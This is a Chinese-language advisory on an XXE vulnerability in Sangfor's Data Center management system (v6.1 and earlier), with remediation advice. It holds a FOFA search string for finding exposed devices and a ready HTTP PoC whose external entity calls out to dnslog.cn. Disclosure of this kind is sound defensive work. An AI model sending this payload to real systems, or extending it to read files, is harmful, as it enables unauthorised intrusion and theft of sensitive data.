0x01 产品简介

   深信服数据中心管理系统DC为AC的外置数据中心，主要用于海量日志数据的异地扩展备份管理，多条件组合的高效查询，统计和趋势报表生成，设备运行状态监控等功能。

0x02 漏洞概述

  深信服数据中心管理系统DC存在XML外部实体注入漏洞。由于后端对传入的XML对象进行了非预期内解析，攻击者可以利用该漏洞进行XML注入攻击，获取系统敏感信息。

0x03 影响范围

    v6.1及以下版本

0x04 复现环境

FOFA： "SANGFOR 数据中心"

0x05 漏洞复现 

PoC

POST /src/sangforindex HTTP/1.1
Host: your-ip
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE root [
    <!ENTITY rt SYSTEM "http://dnslog.cn">
]>
<xxx>
&rt;
</xxx>

验证

0x06 修复建议

规避措施

将设备端口收缩内网，可削减漏洞被利用风险。

升级方案

2016年4月发布的数据中心管理系统v11.0及以上版本已修复，受影响用户可通过升级版本，完成对漏洞的修复。可拨打深信服漏洞专属修复热线400-005-5530获取或联系当地服务人员。